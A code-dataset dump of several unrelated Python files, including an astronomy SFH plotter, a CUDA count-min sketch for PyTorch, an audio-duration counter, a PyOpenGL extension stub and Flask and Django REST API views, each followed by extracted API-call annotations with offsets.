plt.subplots_adjust(hspace=0.1)
figname = os.path.join(self.base, self.name + EXT)
print('wrote {}'.format(figname))
plt.savefig(figname)
plt.close()
def main(argv):
"""
    Main function for sfh.py: plot SFH output from calcsfh, zcombine, or zcmerge.
"""
parser = argparse.ArgumentParser(description="Plot match sfh")
parser.add_argument('sfh_files', nargs='*', type=str,
help='ssp output(s) or formated output(s)')
args = parser.parse_args(argv)
for sfh_file in args.sfh_files:
msfh = SFH(sfh_file)
if len(msfh.data) != 0:
msfh.sfh_plot()
msfh.plot_csfr()
# dic = msfh.param_table()
# print(dic['fmt'].format(**dic))
if __name__ == '__main__':
main(sys.argv[1:])
|
[
"matplotlib.pyplot.savefig",
"numpy.sum",
"argparse.ArgumentParser",
"numpy.abs",
"os.path.join",
"matplotlib.pyplot.close",
"matplotlib.pyplot.legend",
"numpy.nonzero",
"numpy.append",
"numpy.diff",
"numpy.array",
"matplotlib.ticker.NullFormatter",
"numpy.mean",
"matplotlib.pyplot.subplots_adjust",
"numpy.log10",
"os.path.split",
"matplotlib.pyplot.subplots",
"logging.getLogger"
] |
[((268, 287), 'logging.getLogger', 'logging.getLogger', ([], {}), '()\n', (285, 287), False, 'import logging\n'), ((14995, 15048), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Plot match sfh"""'}), "(description='Plot match sfh')\n", (15018, 15048), False, 'import argparse\n'), ((373, 386), 'numpy.sum', 'np.sum', (['(x * x)'], {}), '(x * x)\n', (379, 386), True, 'import numpy as np\n'), ((887, 910), 'os.path.split', 'os.path.split', (['filename'], {}), '(filename)\n', (900, 910), False, 'import os\n'), ((5345, 5398), 'numpy.append', 'np.append', (["self.data['lagei']", "self.data['lagef'][-1]"], {}), "(self.data['lagei'], self.data['lagef'][-1])\n", (5354, 5398), True, 'import numpy as np\n'), ((8162, 8212), 'numpy.append', 'np.append', (['age', "(10 ** (self.data['lagef'][-1] - 9))"], {}), "(age, 10 ** (self.data['lagef'][-1] - 9))\n", (8171, 8212), True, 'import numpy as np\n'), ((8228, 8246), 'numpy.append', 'np.append', (['csfh', '(0)'], {}), '(csfh, 0)\n', (8237, 8246), True, 'import numpy as np\n'), ((8267, 8290), 'numpy.append', 'np.append', (['csfh_errm', '(0)'], {}), '(csfh_errm, 0)\n', (8276, 8290), True, 'import numpy as np\n'), ((8311, 8334), 'numpy.append', 'np.append', (['csfh_errp', '(0)'], {}), '(csfh_errp, 0)\n', (8320, 8334), True, 'import numpy as np\n'), ((9456, 9487), 'numpy.sum', 'np.sum', (['(self.data.sfr * agebins)'], {}), '(self.data.sfr * agebins)\n', (9462, 9487), True, 'import numpy as np\n'), ((9635, 9655), 'numpy.sum', 'np.sum', (['(fracsf * feh)'], {}), '(fracsf * feh)\n', (9641, 9655), True, 'import numpy as np\n'), ((11125, 11165), 'numpy.nonzero', 'np.nonzero', (['(self.data.mh[:iyng + 1] != 0)'], {}), '(self.data.mh[:iyng + 1] != 0)\n', (11135, 11165), True, 'import numpy as np\n'), ((11183, 11223), 'numpy.nonzero', 'np.nonzero', (['(self.data.mh[:iint + 1] != 0)'], {}), '(self.data.mh[:iint + 1] != 0)\n', (11193, 11223), True, 'import numpy as np\n'), ((13096, 13123), 'numpy.abs', 'np.abs', (['(age_arr[idx] - lage)'], {}), '(age_arr[idx] - lage)\n', (13102, 13123), True, 'import numpy as np\n'), ((13834, 13865), 'numpy.sum', 'np.sum', (['(self.data.sfr * agebins)'], {}), '(self.data.sfr * agebins)\n', (13840, 13865), True, 'import numpy as np\n'), ((14515, 14536), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {'nrows': '(2)'}), '(nrows=2)\n', (14527, 14536), True, 'import matplotlib.pyplot as plt\n'), ((14686, 14717), 'matplotlib.pyplot.subplots_adjust', 'plt.subplots_adjust', ([], {'hspace': '(0.1)'}), '(hspace=0.1)\n', (14705, 14717), True, 'import matplotlib.pyplot as plt\n'), ((14736, 14776), 'os.path.join', 'os.path.join', (['self.base', '(self.name + EXT)'], {}), '(self.base, self.name + EXT)\n', (14748, 14776), False, 'import os\n'), ((14827, 14847), 'matplotlib.pyplot.savefig', 'plt.savefig', (['figname'], {}), '(figname)\n', (14838, 14847), True, 'import matplotlib.pyplot as plt\n'), ((14856, 14867), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (14865, 14867), True, 'import matplotlib.pyplot as plt\n'), ((2164, 2176), 'numpy.array', 'np.array', (['[]'], {}), '([])\n', (2172, 2176), True, 'import numpy as np\n'), ((5834, 5855), 'numpy.nonzero', 'np.nonzero', (['(sfrs == 0)'], {}), '(sfrs == 0)\n', (5844, 5855), True, 'import numpy as np\n'), ((6830, 6844), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {}), '()\n', (6842, 6844), True, 'import matplotlib.pyplot as plt\n'), ((7457, 7485), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {'figsize': '(8, 8)'}), '(figsize=(8, 8))\n', (7469, 7485), True, 'import matplotlib.pyplot as plt\n'), ((7498, 7561), 'matplotlib.pyplot.subplots_adjust', 'plt.subplots_adjust', ([], {'right': '(0.95)', 'left': '(0.1)', 'bottom': '(0.1)', 'top': '(0.95)'}), '(right=0.95, left=0.1, bottom=0.1, top=0.95)\n', (7517, 7561), True, 'import matplotlib.pyplot as plt\n'), ((8886, 8918), 'matplotlib.pyplot.legend', 'plt.legend', ([], {'loc': '(0)', 'frameon': '(False)'}), '(loc=0, frameon=False)\n', (8896, 8918), True, 'import matplotlib.pyplot as plt\n'), ((9247, 9267), 'matplotlib.pyplot.savefig', 'plt.savefig', (['outfile'], {}), '(outfile)\n', (9258, 9267), True, 'import matplotlib.pyplot as plt\n'), ((12631, 12645), 'numpy.log10', 'np.log10', (['lage'], {}), '(lage)\n', (12639, 12645), True, 'import numpy as np\n'), ((12974, 12990), 'numpy.diff', 'np.diff', (['age_arr'], {}), '(age_arr)\n', (12981, 12990), True, 'import numpy as np\n'), ((13057, 13079), 'numpy.abs', 'np.abs', (['(age_arr - lage)'], {}), '(age_arr - lage)\n', (13063, 13079), True, 'import numpy as np\n'), ((14013, 14066), 'numpy.sum', 'np.sum', (['(self.data.sfr[idxi:idxf] * agebins[idxi:idxf])'], {}), '(self.data.sfr[idxi:idxf] * agebins[idxi:idxf])\n', (14019, 14066), True, 'import numpy as np\n'), ((14661, 14676), 'matplotlib.ticker.NullFormatter', 'NullFormatter', ([], {}), '()\n', (14674, 14676), False, 'from matplotlib.ticker import NullFormatter\n'), ((3542, 3563), 'numpy.diff', 'np.diff', (['self.data.mh'], {}), '(self.data.mh)\n', (3549, 3563), True, 'import numpy as np\n'), ((5430, 5445), 'numpy.diff', 'np.diff', (['rlages'], {}), '(rlages)\n', (5437, 5445), True, 'import numpy as np\n'), ((6102, 6124), 'numpy.nonzero', 'np.nonzero', (['(rsfrs == 0)'], {}), '(rsfrs == 0)\n', (6112, 6124), True, 'import numpy as np\n'), ((13636, 13660), 'numpy.diff', 'np.diff', (['self.data.lagei'], {}), '(self.data.lagei)\n', (13643, 13660), True, 'import numpy as np\n'), ((9194, 9228), 'os.path.join', 'os.path.join', (['self.base', 'self.name'], {}), '(self.base, self.name)\n', (9206, 9228), False, 'import os\n'), ((6220, 6237), 'numpy.sum', 'np.sum', (['val_merrs'], {}), '(val_merrs)\n', (6226, 6237), True, 'import numpy as np\n'), ((6246, 6263), 'numpy.sum', 'np.sum', (['val_perrs'], {}), '(val_perrs)\n', (6252, 6263), True, 'import numpy as np\n'), ((11305, 11333), 'numpy.mean', 'np.mean', (['self.data.mh[iyngs]'], {}), '(self.data.mh[iyngs])\n', (11312, 11333), True, 'import numpy as np\n'), ((11374, 11402), 'numpy.mean', 'np.mean', (['self.data.mh[iints]'], {}), '(self.data.mh[iints])\n', (11381, 11402), True, 'import numpy as np\n'), ((3628, 3649), 'numpy.diff', 'np.diff', (['self.data.mh'], {}), '(self.data.mh)\n', (3635, 3649), True, 'import numpy as np\n')]
|
import torch
from cupy_kernel import cupyKernel
import numpy as np
import math
kernel = '''
extern "C"
__inline__ __device__
int hash(int value, int range, int a, int b)
{
int h = a * value + b;
h ^= h >> 16;
h *= 0x85ebca6b;
h ^= h >> 13;
h *= 0xc2b2ae35;
h ^= h >> 16;
return h % range;
}
extern "C"
__inline__ __device__
float minimum(float a, float b, float c)
{
return fminf(fminf(a,b),c);
}
extern "C"
__inline__ __device__
float update_retrieve(float* mem,
float* result,
const float beta,
const int N,
const int D,
const long index,
const float value)
{
int a = 994443;
int b = 609478;
const int hash_idx = hash(index, N, a, b) * D + threadIdx.x;
float old_value = mem[hash_idx];
float update = (1. - beta) * (value - old_value);
atomicAdd(&mem[hash_idx], update);
return old_value + update;
}
extern "C"
__inline__ __device__
float cms_update_retrieve(float* mem,
float* result,
const float beta,
const int N,
const int W,
const int D,
const long index,
const float value)
{
float r[3];
int a[3] = {994443, 4113759, 9171025};
int b[3] = {609478, 2949676, 2171464};
for(int idx = 0; idx < 3; ++idx)
{
const int hash_idx = idx*W + hash(index, N, a[idx], b[idx]) * D + threadIdx.x;
float old_value = mem[hash_idx];
float update = (1. - beta) * (value - old_value);
atomicAdd(&mem[hash_idx], update);
r[idx] = old_value + update;
}
return minimum(r[0], r[1], r[2]);
}
extern "C"
__global__
void cms_hash_update_retrieve(const long* indices,
const float* values,
const float* beta,
float* mem,
float* result,
const int N,
const int W,
const int D)
{
if(threadIdx.x < D)
{
const int idx = blockIdx.x * D + threadIdx.x;
const float value = values[idx];
const long index = indices[blockIdx.x];
result[idx] = cms_update_retrieve(mem, result, *beta, N, W, D, index, value);
}
}
'''
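# The kernel above implements a count-min sketch with an exponential moving
# average: each (index, value) pair is hashed into three sketch rows, every
# hashed cell is moved toward the new value by a factor of (1 - beta), and
# the retrieved estimate is the minimum over the three rows. The following is
# a rough pure-Python analogue of cms_update_retrieve for a single cell per
# row -- a sketch for understanding the semantics, not a replacement for the
# CUDA code:
def _cms_update_retrieve_cpu(mem_rows, hashed_cells, value, beta):
    # mem_rows: three 1-D float arrays; hashed_cells: one column index per row.
    retrieved = []
    for row, cell in zip(mem_rows, hashed_cells):
        old = row[cell]
        update = (1.0 - beta) * (value - old)
        row[cell] += update            # EMA update of the sketch cell
        retrieved.append(old + update)
    return min(retrieved)              # count-min: report the smallest estimate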
class CountMinSketch:
def __init__(self, N, D, sketch_size=0.20):
self.N = N
self.D = D
        self.blk_size = math.ceil(D / 32) * 32  # round up to a multiple of the 32-thread warp size
self.range = int(N*sketch_size/3.)
self.width = self.range * D
self.kernel = cupyKernel(kernel, "cms_hash_update_retrieve")
self.cms = torch.zeros(3, self.range, D).float().cuda()
print(N, "CMS", self.cms.size())
def update(self, indices, values, size, beta):
M, D = values.size()
result = torch.zeros(values.size()).float().cuda()
beta = torch.FloatTensor([beta]).cuda()
self.kernel(grid=(M,1,1),
block=(self.blk_size,1,1),
args=[indices.data_ptr(),
values.data_ptr(),
beta.data_ptr(),
self.cms.data_ptr(),
result.data_ptr(),
self.range,
self.width,
self.D],
strm=torch.cuda.current_stream().cuda_stream)
return torch.cuda.sparse.FloatTensor(indices, result, size)
def clean(self, alpha):
self.cms.mul_(alpha)
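# A minimal usage sketch (requires a CUDA device; tensor names and shapes are
# invented for illustration): approximating per-row optimizer state for a
# sparse update with N possible rows of width D.
#     sketch = CountMinSketch(N=100000, D=128, sketch_size=0.20)
#     # indices: cuda LongTensor of shape (M,); values: cuda FloatTensor (M, D)
#     # size: the torch.Size of the dense tensor being approximated
#     approx = sketch.update(indices, values, size, beta=0.9)
#     sketch.clean(alpha=0.99)  # decay every sketch cell by alpha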
|
[
"math.ceil",
"torch.FloatTensor",
"torch.zeros",
"torch.cuda.sparse.FloatTensor",
"cupy_kernel.cupyKernel",
"torch.cuda.current_stream"
] |
[((2143, 2189), 'cupy_kernel.cupyKernel', 'cupyKernel', (['kernel', '"""cms_hash_update_retrieve"""'], {}), "(kernel, 'cms_hash_update_retrieve')\n", (2153, 2189), False, 'from cupy_kernel import cupyKernel\n'), ((2935, 2987), 'torch.cuda.sparse.FloatTensor', 'torch.cuda.sparse.FloatTensor', (['indices', 'result', 'size'], {}), '(indices, result, size)\n', (2964, 2987), False, 'import torch\n'), ((2018, 2036), 'math.ceil', 'math.ceil', (['(D // 32)'], {}), '(D // 32)\n', (2027, 2036), False, 'import math\n'), ((2450, 2475), 'torch.FloatTensor', 'torch.FloatTensor', (['[beta]'], {}), '([beta])\n', (2467, 2475), False, 'import torch\n'), ((2879, 2906), 'torch.cuda.current_stream', 'torch.cuda.current_stream', ([], {}), '()\n', (2904, 2906), False, 'import torch\n'), ((2209, 2238), 'torch.zeros', 'torch.zeros', (['(3)', 'self.range', 'D'], {}), '(3, self.range, D)\n', (2220, 2238), False, 'import torch\n')]
|
import argparse
import warnings
import librosa
from tqdm import tqdm
SAMPLE_RATE = 16000
def read_audio_and_text(inputs):
    """Load the audio file and return its duration in seconds."""
    audio_path = inputs['file_path']
    audio, sr = librosa.load(audio_path, sr=SAMPLE_RATE, mono=True)
    return audio.size / float(sr)
def process_line(args, line):
filename, language, text = line.split(args.delimiter)
inputs = {
'file_path': filename,
'text': text.strip(),
'language': language
}
try:
return read_audio_and_text(inputs)
except Exception as err:
print(str(err))
return 0
def main(args):
with open(args.input_file) as f:
total = 0
for x in tqdm(f):
total += process_line(args, x)
total /= 3600
print('Hours: ', total)
if __name__ == '__main__':
warnings.simplefilter(action='ignore', category=FutureWarning)
parser = argparse.ArgumentParser()
parser.add_argument('--input_file', help='File with audio paths and texts.', required=True)
parser.add_argument('--step', help='Analysis window step in ms.', type=int, default=10)
parser.add_argument('--start', help='Index of example to start from', type=int, default=0)
parser.add_argument('--delimiter', help='CSV delimiter', type=str, default=',')
main(parser.parse_args())
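# The input file is expected to hold one entry per line with the audio path,
# language, and transcript separated by --delimiter (default ','). A
# hypothetical line and invocation (path, text, and script name invented for
# illustration):
#     /data/clips/utt0001.wav,en,hello world
#     python compute_hours.py --input_file manifest.csv --delimiter ','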
|
[
"tqdm.tqdm",
"librosa.load",
"warnings.simplefilter",
"argparse.ArgumentParser"
] |
[((179, 230), 'librosa.load', 'librosa.load', (['audio_path'], {'sr': 'SAMPLE_RATE', 'mono': '(True)'}), '(audio_path, sr=SAMPLE_RATE, mono=True)\n', (191, 230), False, 'import librosa\n'), ((817, 879), 'warnings.simplefilter', 'warnings.simplefilter', ([], {'action': '"""ignore"""', 'category': 'FutureWarning'}), "(action='ignore', category=FutureWarning)\n", (838, 879), False, 'import warnings\n'), ((894, 919), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {}), '()\n', (917, 919), False, 'import argparse\n'), ((678, 685), 'tqdm.tqdm', 'tqdm', (['f'], {}), '(f)\n', (682, 685), False, 'from tqdm import tqdm\n')]
|
'''OpenGL extension SUN.convolution_border_modes
Automatically generated by the get_gl_extensions script, do not edit!
'''
from OpenGL import platform, constants, constant, arrays
from OpenGL import extensions
from OpenGL.GL import glget
import ctypes
EXTENSION_NAME = 'GL_SUN_convolution_border_modes'
_DEPRECATED = False
GL_WRAP_BORDER_SUN = constant.Constant( 'GL_WRAP_BORDER_SUN', 0x81D4 )
def glInitConvolutionBorderModesSUN():
'''Return boolean indicating whether this extension is available'''
return extensions.hasGLExtension( EXTENSION_NAME )
|
[
"OpenGL.constant.Constant",
"OpenGL.extensions.hasGLExtension"
] |
[((345, 391), 'OpenGL.constant.Constant', 'constant.Constant', (['"""GL_WRAP_BORDER_SUN"""', '(33236)'], {}), "('GL_WRAP_BORDER_SUN', 33236)\n", (362, 391), False, 'from OpenGL import platform, constants, constant, arrays\n'), ((519, 560), 'OpenGL.extensions.hasGLExtension', 'extensions.hasGLExtension', (['EXTENSION_NAME'], {}), '(EXTENSION_NAME)\n', (544, 560), False, 'from OpenGL import extensions\n')]
|
from datetime import datetime, timedelta
from random import shuffle
from flask import request
from flask_restful import Resource, abort
from sqlalchemy.sql.expression import func
from backend.model.project import FluencyProject
from backend.model.result import FluencyResultSchema, FluencyResult
from backend.model.project_status import ProjectStatus, ProjectStatusSchema
from backend.model import ma, db
from backend.model.summary import SummarySchema, SanitySummarySchema, \
Summary, SanitySummary, SummaryGroup, SummaryGroupList
class ResSumObj(object):
def __init__(self, result, summary):
self.result = result
self.summary = summary
class ResSumSchema(ma.Schema):
result = ma.Nested(FluencyResultSchema)
summary = ma.Nested(SummarySchema)
class FluencyObj(object):
def __init__(self, res_sums, sanity_summ, proj_status):
self.res_sums = res_sums
self.sanity_summ = sanity_summ
self.proj_status = proj_status
class FluencySchema(ma.Schema):
res_sums = ma.Nested(ResSumSchema, many=True)
sanity_summ = ma.Nested(SanitySummarySchema)
proj_status = ma.Nested(ProjectStatusSchema)
class FluencyResource(Resource):
def post(self):
data = request.get_json()
old_results = []
# print(data['results'])
for result in data['results']:
old_result = FluencyResult.query.get(result['id'])
old_result.fluency = result['fluency']
old_results.append(old_result)
proj_status = ProjectStatus.query.get(data['proj_status']['id'])
proj_status.validity = data['proj_status']['validity']
proj_status.is_finished = data['proj_status']['is_finished']
proj_status.is_active = data['proj_status']['is_active']
proj_status.good_summ_score = data['proj_status']['good_summ_score']
proj_status.mediocre_summ_score = data['proj_status']['mediocre_summ_score']
proj_status.bad_summ_score = data['proj_status']['bad_summ_score']
proj_status.sanity_summ_id = data['proj_status']['sanity_summ_id']
if not proj_status.validity:
# Recreate results
results = []
for result in data['results']:
new_result = FluencyResult(
summary_id=result['summary_id'],
proj_status_id=result['proj_status_id'])
results.append(new_result)
db.session.bulk_save_objects(results)
# Invalidate old results
for old_result in old_results:
old_result.is_invalid = True
db.session.commit()
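    # A sketch of the JSON payload the handler above expects; the keys are
    # taken from the code, the values are invented for illustration:
    #     {"results": [{"id": 1, "fluency": 4, "summary_id": 10,
    #                   "proj_status_id": 2}],
    #      "proj_status": {"id": 2, "validity": true, "is_finished": true,
    #                      "is_active": false, "good_summ_score": 1,
    #                      "mediocre_summ_score": 0, "bad_summ_score": 0,
    #                      "sanity_summ_id": 5}}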
def get(self, project_id):
project = FluencyProject.query.get(project_id)
if project is None:
return abort(404, message=f"Fluency project {project_id} not found")
else:
# Get one unfinished project_status
current_time = datetime.utcnow()
proj_status = ProjectStatus.query\
.filter_by(fluency_proj_id=project.id,
is_finished=False, is_active=False)\
.order_by(func.rand())\
.first()
if proj_status is None:
proj_status = ProjectStatus.query \
.filter_by(fluency_proj_id=project.id, is_finished=False)\
.filter(ProjectStatus.expired_in < current_time)\
.order_by(func.rand())\
.first()
if proj_status is None:
return abort(404, message=f"No project status is opened.")
# Get related results
results = FluencyResult.query\
.filter_by(proj_status_id=proj_status.id, is_invalid=False)\
.all()
res_sums = []
for result in results:
summary = Summary.query.get(result.summary_id)
res_sums.append(ResSumObj(result=result, summary=summary))
# Get random sanity summaries
# The function rand() is specific to MySql only (https://stackoverflow.com/q/60805)
sanity_summ = SanitySummary.query.order_by(func.rand()).first()
fluency = FluencyObj(
res_sums=res_sums,
sanity_summ=sanity_summ,
proj_status=proj_status)
# Change project status attribute before sending
proj_status.is_active = True
proj_status.expired_in = datetime.utcnow() + timedelta(minutes=project.expire_duration)
db.session.commit()
return FluencySchema().dump(fluency)
|
[
"sqlalchemy.sql.expression.func.rand",
"backend.model.project_status.ProjectStatus.query.get",
"flask_restful.abort",
"backend.model.summary.Summary.query.get",
"backend.model.project_status.ProjectStatus.query.filter_by",
"datetime.datetime.utcnow",
"flask.request.get_json",
"backend.model.ma.Nested",
"backend.model.db.session.bulk_save_objects",
"datetime.timedelta",
"backend.model.db.session.commit",
"backend.model.result.FluencyResult",
"backend.model.result.FluencyResult.query.get",
"backend.model.result.FluencyResult.query.filter_by",
"backend.model.project.FluencyProject.query.get"
] |
[((712, 742), 'backend.model.ma.Nested', 'ma.Nested', (['FluencyResultSchema'], {}), '(FluencyResultSchema)\n', (721, 742), False, 'from backend.model import ma, db\n'), ((757, 781), 'backend.model.ma.Nested', 'ma.Nested', (['SummarySchema'], {}), '(SummarySchema)\n', (766, 781), False, 'from backend.model import ma, db\n'), ((1030, 1064), 'backend.model.ma.Nested', 'ma.Nested', (['ResSumSchema'], {'many': '(True)'}), '(ResSumSchema, many=True)\n', (1039, 1064), False, 'from backend.model import ma, db\n'), ((1083, 1113), 'backend.model.ma.Nested', 'ma.Nested', (['SanitySummarySchema'], {}), '(SanitySummarySchema)\n', (1092, 1113), False, 'from backend.model import ma, db\n'), ((1132, 1162), 'backend.model.ma.Nested', 'ma.Nested', (['ProjectStatusSchema'], {}), '(ProjectStatusSchema)\n', (1141, 1162), False, 'from backend.model import ma, db\n'), ((1234, 1252), 'flask.request.get_json', 'request.get_json', ([], {}), '()\n', (1250, 1252), False, 'from flask import request\n'), ((1529, 1579), 'backend.model.project_status.ProjectStatus.query.get', 'ProjectStatus.query.get', (["data['proj_status']['id']"], {}), "(data['proj_status']['id'])\n", (1552, 1579), False, 'from backend.model.project_status import ProjectStatus, ProjectStatusSchema\n'), ((2609, 2628), 'backend.model.db.session.commit', 'db.session.commit', ([], {}), '()\n', (2626, 2628), False, 'from backend.model import ma, db\n'), ((2679, 2715), 'backend.model.project.FluencyProject.query.get', 'FluencyProject.query.get', (['project_id'], {}), '(project_id)\n', (2703, 2715), False, 'from backend.model.project import FluencyProject\n'), ((1375, 1412), 'backend.model.result.FluencyResult.query.get', 'FluencyResult.query.get', (["result['id']"], {}), "(result['id'])\n", (1398, 1412), False, 'from backend.model.result import FluencyResultSchema, FluencyResult\n'), ((2438, 2475), 'backend.model.db.session.bulk_save_objects', 'db.session.bulk_save_objects', (['results'], {}), '(results)\n', (2466, 2475), False, 'from backend.model import ma, db\n'), ((2763, 2824), 'flask_restful.abort', 'abort', (['(404)'], {'message': 'f"""Fluency project {project_id} not found"""'}), "(404, message=f'Fluency project {project_id} not found')\n", (2768, 2824), False, 'from flask_restful import Resource, abort\n'), ((2914, 2931), 'datetime.datetime.utcnow', 'datetime.utcnow', ([], {}), '()\n', (2929, 2931), False, 'from datetime import datetime, timedelta\n'), ((4542, 4561), 'backend.model.db.session.commit', 'db.session.commit', ([], {}), '()\n', (4559, 4561), False, 'from backend.model import ma, db\n'), ((2254, 2346), 'backend.model.result.FluencyResult', 'FluencyResult', ([], {'summary_id': "result['summary_id']", 'proj_status_id': "result['proj_status_id']"}), "(summary_id=result['summary_id'], proj_status_id=result[\n 'proj_status_id'])\n", (2267, 2346), False, 'from backend.model.result import FluencyResultSchema, FluencyResult\n'), ((3532, 3583), 'flask_restful.abort', 'abort', (['(404)'], {'message': 'f"""No project status is opened."""'}), "(404, message=f'No project status is opened.')\n", (3537, 3583), False, 'from flask_restful import Resource, abort\n'), ((3849, 3885), 'backend.model.summary.Summary.query.get', 'Summary.query.get', (['result.summary_id'], {}), '(result.summary_id)\n', (3866, 3885), False, 'from backend.model.summary import SummarySchema, SanitySummarySchema, Summary, SanitySummary, SummaryGroup, SummaryGroupList\n'), ((4467, 4484), 'datetime.datetime.utcnow', 'datetime.utcnow', ([], {}), '()\n', (4482, 4484), False, 'from datetime import datetime, timedelta\n'), ((4487, 4529), 'datetime.timedelta', 'timedelta', ([], {'minutes': 'project.expire_duration'}), '(minutes=project.expire_duration)\n', (4496, 4529), False, 'from datetime import datetime, timedelta\n'), ((3640, 3718), 'backend.model.result.FluencyResult.query.filter_by', 'FluencyResult.query.filter_by', ([], {'proj_status_id': 'proj_status.id', 'is_invalid': '(False)'}), '(proj_status_id=proj_status.id, is_invalid=False)\n', (3669, 3718), False, 'from backend.model.result import FluencyResultSchema, FluencyResult\n'), ((3124, 3135), 'sqlalchemy.sql.expression.func.rand', 'func.rand', ([], {}), '()\n', (3133, 3135), False, 'from sqlalchemy.sql.expression import func\n'), ((4155, 4166), 'sqlalchemy.sql.expression.func.rand', 'func.rand', ([], {}), '()\n', (4164, 4166), False, 'from sqlalchemy.sql.expression import func\n'), ((2958, 3055), 'backend.model.project_status.ProjectStatus.query.filter_by', 'ProjectStatus.query.filter_by', ([], {'fluency_proj_id': 'project.id', 'is_finished': '(False)', 'is_active': '(False)'}), '(fluency_proj_id=project.id, is_finished=False,\n is_active=False)\n', (2987, 3055), False, 'from backend.model.project_status import ProjectStatus, ProjectStatusSchema\n'), ((3430, 3441), 'sqlalchemy.sql.expression.func.rand', 'func.rand', ([], {}), '()\n', (3439, 3441), False, 'from sqlalchemy.sql.expression import func\n'), ((3229, 3305), 'backend.model.project_status.ProjectStatus.query.filter_by', 'ProjectStatus.query.filter_by', ([], {'fluency_proj_id': 'project.id', 'is_finished': '(False)'}), '(fluency_proj_id=project.id, is_finished=False)\n', (3258, 3305), False, 'from backend.model.project_status import ProjectStatus, ProjectStatusSchema\n')]
|
from datetime import datetime
from itertools import chain
from rest_framework.response import Response
from rest_framework.views import APIView
from .models import User, Character
from .serializers import *
from rest_framework import generics
from rest_framework.permissions import IsAuthenticated, IsAdminUser
from rest_framework import status
from rest_framework.decorators import api_view, permission_classes
@permission_classes([IsAuthenticated])
class CharacterCreateAPIView(generics.CreateAPIView):
serializer_class = CharacterCreateSerializer
queryset = Character.objects.all()
@permission_classes([IsAuthenticated])
class CharacterListAPIView(generics.ListAPIView):
serializer_class = CharacterPublicSerializer
model = Character
queryset = Character.objects.all()
@permission_classes([IsAuthenticated])
class UserListAPIView(generics.ListAPIView):
serializer_class = UserSerializer
queryset = User.objects.all()
@permission_classes([IsAuthenticated])
class EventListAPIView(generics.ListAPIView):
serializer_class = EventSerializer
queryset = Event.objects.all()
model = Event
def get_queryset(self):
date = self.request.GET.get('date')
if date:
try:
date_time_obj = datetime.strptime(date, '%d.%m.%Y %H:%M:%S')
queryset = self.queryset.filter(period="d")
queryset_week2 = self.queryset.filter(period="w")\
.filter(period_across=2)\
.filter(period_parity=date_time_obj.timetuple().tm_yday // 7 % 2)\
                    .filter(start_date__iso_week_day=date_time_obj.isoweekday())
queryset_week1 = self.queryset.filter(period="w")\
.filter(period_across=1)\
.filter(start_date__iso_week_day=date_time_obj.isoweekday())
queryset = list(chain(queryset, queryset_week1, queryset_week2))
except ValueError:
queryset = self.model.objects.none()
return queryset
return self.model.objects.all()
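# A hedged request sketch against the list endpoint above (URL path invented
# for illustration; the space in the date must be URL-encoded):
#     GET /events/?date=01.06.2021 12:00:00
# returns daily events plus weekly events whose ISO weekday matches the date,
# with two-week events additionally filtered by the parity of the date's
# week of the year.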
@permission_classes([IsAuthenticated])
class UserAPIView(generics.ListAPIView):
model = User
serializer_class = UserSerializer
queryset = model.objects.all()
def get_queryset(self):
username = self.request.GET.get('username')
if not username:
username = self.request.user.username
if username:
try:
queryset = self.queryset.filter(username=username)
except ValueError:
queryset = self.model.objects.none()
return queryset
return self.model.objects.none()
@staticmethod
def patch(request):
user = request.user
serializer = UserUpdateSerializer(user, data=request.data, partial=True)
if serializer.is_valid():
serializer.save()
return Response(status=status.HTTP_201_CREATED, data=serializer.data)
return Response(status=status.HTTP_400_BAD_REQUEST, data="wrong parameters")
@permission_classes([IsAuthenticated])
class UserCharactersAPIView(generics.ListAPIView):
serializer_class = UserCharactersSerializer
queryset = User.objects.all()
def get_queryset(self):
username = self.request.GET.get('username')
if username:
try:
queryset = self.queryset.filter(username=username)
except ValueError:
                queryset = User.objects.none()
            return queryset
        return User.objects.none()
@permission_classes([IsAuthenticated])
class CharacterEventsAPIView(generics.ListAPIView):
serializer_class = CharacterEventsSerializer
queryset = Character.objects.all()
def get_queryset(self):
nickname = self.request.GET.get('nickname')
if nickname:
try:
queryset = self.queryset.filter(nickname=nickname)
except ValueError:
                queryset = Character.objects.none()
            return queryset
        return Character.objects.none()
@permission_classes([IsAuthenticated])
class UserCharacterEventsAPIView(generics.ListAPIView):
serializer_class = CharacterOwnerSerializer
queryset = CharacterOwner.objects.all()
    def list(self, request, *args, **kwargs):
date = self.request.GET.get('date')
inner_character_event = CharacterEvent.objects.filter(date=date)
inner_character = Character.objects.filter(character_events__in=inner_character_event)
queryset = CharacterOwner.objects.filter(owner=request.user).filter(character__in=inner_character)
serializer = UserCharacterEventsSerializer(queryset, many=True)
return Response(serializer.data)
@permission_classes([IsAuthenticated])
class CharacterEventsCountAPIView(generics.ListAPIView):
serializer_class = CharacterEventsCountSerializer
queryset = Character.objects.all()
def get_queryset(self):
nickname = self.request.GET.get('nickname')
if nickname:
try:
queryset = self.queryset.filter(nickname=nickname)
except ValueError:
                queryset = Character.objects.none()
            return queryset
        return Character.objects.none()
@permission_classes([IsAuthenticated])
class CharacterOwnersListAPIView(generics.ListAPIView):
serializer_class = CharacterOwnerSerializer
queryset = CharacterOwner.objects.all()
@permission_classes([IsAuthenticated])
class CharacterEventsListAPIView(generics.ListAPIView):
serializer_class = CharacterEventSerializer
queryset = CharacterEvent.objects.all()
|
[
"rest_framework.decorators.permission_classes",
"datetime.datetime.strptime",
"rest_framework.response.Response",
"itertools.chain"
] |
[((416, 453), 'rest_framework.decorators.permission_classes', 'permission_classes', (['[IsAuthenticated]'], {}), '([IsAuthenticated])\n', (434, 453), False, 'from rest_framework.decorators import api_view, permission_classes\n'), ((599, 636), 'rest_framework.decorators.permission_classes', 'permission_classes', (['[IsAuthenticated]'], {}), '([IsAuthenticated])\n', (617, 636), False, 'from rest_framework.decorators import api_view, permission_classes\n'), ((800, 837), 'rest_framework.decorators.permission_classes', 'permission_classes', (['[IsAuthenticated]'], {}), '([IsAuthenticated])\n', (818, 837), False, 'from rest_framework.decorators import api_view, permission_classes\n'), ((958, 995), 'rest_framework.decorators.permission_classes', 'permission_classes', (['[IsAuthenticated]'], {}), '([IsAuthenticated])\n', (976, 995), False, 'from rest_framework.decorators import api_view, permission_classes\n'), ((2086, 2123), 'rest_framework.decorators.permission_classes', 'permission_classes', (['[IsAuthenticated]'], {}), 